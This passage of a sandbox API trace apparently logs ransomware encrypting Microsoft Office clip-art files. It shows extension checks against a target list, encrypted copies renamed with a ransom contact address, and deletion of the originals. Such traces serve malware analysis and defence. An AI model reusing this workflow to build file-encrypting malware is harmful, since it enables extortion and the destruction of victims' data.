(hFile=0x37c) returned 1 [0181.599] CloseHandle (hObject=0x37c) returned 1 [0181.599] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.599] SetEndOfFile (hFile=0x378) returned 1 [0181.600] CloseHandle (hObject=0x378) returned 1 [0181.600] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105348.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0181.600] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105348.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105348.wmf")) returned 1 [0181.601] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105348.WMF") returned 68 [0181.601] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105348.WMF") returned 68 [0181.601] lstrlenW (lpString=".doc") returned 4 [0181.601] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0181.601] lstrlenW (lpString=".docx") returned 5 [0181.601] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0181.601] lstrlenW (lpString=".pdf") returned 4 [0181.601] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0181.601] lstrlenW (lpString=".xls") returned 4 [0181.601] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0181.601] lstrlenW (lpString=".xlsx") returned 5 [0181.601] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0181.601] lstrlenW (lpString=".ppt") returned 4 [0181.601] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0181.601] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105348.WMF") returned 68 [0181.601] lstrlenW (lpString=".zip") returned 4 [0181.601] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0181.601] lstrlenW (lpString=".rar") returned 4 [0181.601] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0181.601] lstrlenW (lpString=".bz2") returned 4 [0181.601] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0181.601] lstrlenW (lpString=".7z") returned 3 [0181.601] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0181.601] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105348.WMF") returned 68 [0181.601] lstrlenW (lpString=".dbf") returned 4 [0181.601] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0181.601] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105348.WMF") returned 68 [0181.601] lstrlenW (lpString=".1cd") returned 4 [0181.601] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0181.601] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105348.WMF") returned 68 [0181.601] lstrlenW (lpString=".jpg") returned 4 [0181.601] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0181.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105348.WMF") returned 68 [0181.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105348.WMF") returned 68 [0181.602] lstrlenW (lpString=".doc") returned 4 [0181.602] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0181.602] lstrlenW (lpString=".docx") returned 5 [0181.602] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0181.602] lstrlenW (lpString=".pdf") returned 4 [0181.602] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0181.602] lstrlenW (lpString=".xls") returned 4 [0181.602] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0181.602] lstrlenW (lpString=".xlsx") returned 5 [0181.602] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0181.602] lstrlenW (lpString=".ppt") returned 4 [0181.602] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0181.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105348.WMF") returned 68 [0181.602] lstrlenW (lpString=".zip") returned 4 [0181.602] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0181.602] lstrlenW (lpString=".rar") returned 4 [0181.602] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0181.602] lstrlenW (lpString=".bz2") returned 4 [0181.602] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0181.602] lstrlenW (lpString=".7z") returned 3 [0181.602] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0181.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105348.WMF") returned 68 [0181.602] lstrlenW (lpString=".dbf") returned 4 [0181.602] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0181.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105348.WMF") returned 68 [0181.602] lstrlenW (lpString=".1cd") returned 4 [0181.602] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0181.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105348.WMF") returned 68 [0181.602] lstrlenW (lpString=".jpg") returned 4 [0181.602] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0181.602] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0181.602] lstrlenW (lpString="J0105384.WMF") returned 12 [0181.602] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105384.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105384.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0181.603] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=5880) returned 1 [0181.603] CloseHandle (hObject=0x378) returned 1 [0181.603] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105384.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105384.wmf")) returned 0x220 [0181.603] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105384.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105384.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0181.603] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105384.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105384.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0181.603] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.603] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.603] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105384.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105384.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0181.604] GetLastError () returned 0x0 [0181.604] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x16f8, lpOverlapped=0x0) returned 1 [0181.774] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x1700, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x1700, lpOverlapped=0x0) returned 1 [0182.078] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0182.078] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0182.078] SetEndOfFile (hFile=0x37c) returned 1 [0182.078] CloseHandle (hObject=0x37c) returned 1 [0182.078] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.078] SetEndOfFile (hFile=0x378) returned 1 [0182.079] CloseHandle (hObject=0x378) returned 1 [0182.079] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105384.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.079] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105384.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105384.wmf")) returned 1 [0182.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105384.WMF") returned 68 [0182.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105384.WMF") returned 68 [0182.080] lstrlenW (lpString=".doc") returned 4 [0182.080] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.080] lstrlenW (lpString=".docx") returned 5 [0182.080] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0182.080] lstrlenW (lpString=".pdf") returned 4 [0182.080] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.080] lstrlenW (lpString=".xls") returned 4 [0182.080] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.080] lstrlenW (lpString=".xlsx") returned 5 [0182.080] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0182.080] lstrlenW (lpString=".ppt") returned 4 [0182.080] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105384.WMF") returned 68 [0182.080] lstrlenW (lpString=".zip") returned 4 [0182.080] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.080] lstrlenW (lpString=".rar") returned 4 [0182.080] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.080] lstrlenW (lpString=".bz2") returned 4 [0182.080] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.080] lstrlenW (lpString=".7z") returned 3 [0182.080] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105384.WMF") returned 68 [0182.080] lstrlenW (lpString=".dbf") returned 4 [0182.080] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105384.WMF") returned 68 [0182.081] lstrlenW (lpString=".1cd") returned 4 [0182.081] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105384.WMF") returned 68 [0182.081] lstrlenW (lpString=".jpg") returned 4 [0182.081] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105384.WMF") returned 68 [0182.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105384.WMF") returned 68 [0182.081] lstrlenW (lpString=".doc") returned 4 [0182.081] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.081] lstrlenW (lpString=".docx") returned 5 [0182.081] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0182.081] lstrlenW (lpString=".pdf") returned 4 [0182.081] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.081] lstrlenW (lpString=".xls") returned 4 [0182.081] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.081] lstrlenW (lpString=".xlsx") returned 5 [0182.081] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0182.081] lstrlenW (lpString=".ppt") returned 4 [0182.081] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105384.WMF") returned 68 [0182.081] lstrlenW (lpString=".zip") returned 4 [0182.081] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.081] lstrlenW (lpString=".rar") returned 4 [0182.081] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.081] lstrlenW (lpString=".bz2") returned 4 [0182.081] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.081] lstrlenW (lpString=".7z") returned 3 [0182.081] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105384.WMF") returned 68 [0182.081] lstrlenW (lpString=".dbf") returned 4 [0182.081] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105384.WMF") returned 68 [0182.082] lstrlenW (lpString=".1cd") returned 4 [0182.082] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105384.WMF") returned 68 [0182.082] lstrlenW (lpString=".jpg") returned 4 [0182.082] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.082] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0182.082] lstrlenW (lpString="J0105496.WMF") returned 12 [0182.082] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105496.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105496.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0182.082] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=5156) returned 1 [0182.082] CloseHandle (hObject=0x378) returned 1 [0182.083] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105496.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105496.wmf")) returned 0x220 [0182.083] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105496.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105496.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.083] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105496.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105496.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0182.083] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.083] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.083] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105496.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105496.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0182.084] GetLastError () returned 0x0 [0182.084] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x1424, lpOverlapped=0x0) returned 1 [0182.086] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x1430, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x1430, lpOverlapped=0x0) returned 1 [0182.087] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0182.087] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0182.087] SetEndOfFile (hFile=0x37c) returned 1 [0182.087] CloseHandle (hObject=0x37c) returned 1 [0182.087] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.087] SetEndOfFile (hFile=0x378) returned 1 [0182.088] CloseHandle (hObject=0x378) returned 1 [0182.088] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105496.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.089] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105496.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105496.wmf")) returned 1 [0182.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105496.WMF") returned 68 [0182.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105496.WMF") returned 68 [0182.089] lstrlenW (lpString=".doc") returned 4 [0182.089] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.089] lstrlenW (lpString=".docx") returned 5 [0182.089] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0182.089] lstrlenW (lpString=".pdf") returned 4 [0182.089] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.089] lstrlenW (lpString=".xls") returned 4 [0182.089] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.089] lstrlenW (lpString=".xlsx") returned 5 [0182.089] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0182.089] lstrlenW (lpString=".ppt") returned 4 [0182.089] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105496.WMF") returned 68 [0182.089] lstrlenW (lpString=".zip") returned 4 [0182.089] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.089] lstrlenW (lpString=".rar") returned 4 [0182.089] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.089] lstrlenW (lpString=".bz2") returned 4 [0182.090] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.090] lstrlenW (lpString=".7z") returned 3 [0182.090] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105496.WMF") returned 68 [0182.090] lstrlenW (lpString=".dbf") returned 4 [0182.090] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105496.WMF") returned 68 [0182.090] lstrlenW (lpString=".1cd") returned 4 [0182.090] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105496.WMF") returned 68 [0182.090] lstrlenW (lpString=".jpg") returned 4 [0182.090] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105496.WMF") returned 68 [0182.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105496.WMF") returned 68 [0182.090] lstrlenW (lpString=".doc") returned 4 [0182.090] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.090] lstrlenW (lpString=".docx") returned 5 [0182.090] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0182.090] lstrlenW (lpString=".pdf") returned 4 [0182.090] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.090] lstrlenW (lpString=".xls") returned 4 [0182.090] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.090] lstrlenW (lpString=".xlsx") returned 5 [0182.090] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0182.090] lstrlenW (lpString=".ppt") returned 4 [0182.090] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105496.WMF") returned 68 [0182.090] lstrlenW (lpString=".zip") returned 4 [0182.090] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.090] lstrlenW (lpString=".rar") returned 4 [0182.090] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.091] lstrlenW (lpString=".bz2") returned 4 [0182.091] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.091] lstrlenW (lpString=".7z") returned 3 [0182.091] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.091] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105496.WMF") returned 68 [0182.091] lstrlenW (lpString=".dbf") returned 4 [0182.091] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.091] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105496.WMF") returned 68 [0182.091] lstrlenW (lpString=".1cd") returned 4 [0182.091] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.091] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105496.WMF") returned 68 [0182.091] lstrlenW (lpString=".jpg") returned 4 [0182.091] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.091] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0182.091] lstrlenW (lpString="J0105502.WMF") returned 12 [0182.091] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105502.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105502.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0182.092] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=5472) returned 1 [0182.092] CloseHandle (hObject=0x378) returned 1 [0182.092] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105502.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105502.wmf")) returned 0x220 [0182.092] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105502.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105502.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.092] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105502.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105502.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0182.092] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.092] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.092] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105502.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105502.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0182.093] GetLastError () returned 0x0 [0182.093] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x1560, lpOverlapped=0x0) returned 1 [0182.095] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x1570, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x1570, lpOverlapped=0x0) returned 1 [0182.097] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0182.097] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0182.097] SetEndOfFile (hFile=0x37c) returned 1 [0182.097] CloseHandle (hObject=0x37c) returned 1 [0182.097] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.097] SetEndOfFile (hFile=0x378) returned 1 [0182.098] CloseHandle (hObject=0x378) returned 1 [0182.098] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105502.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.098] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft 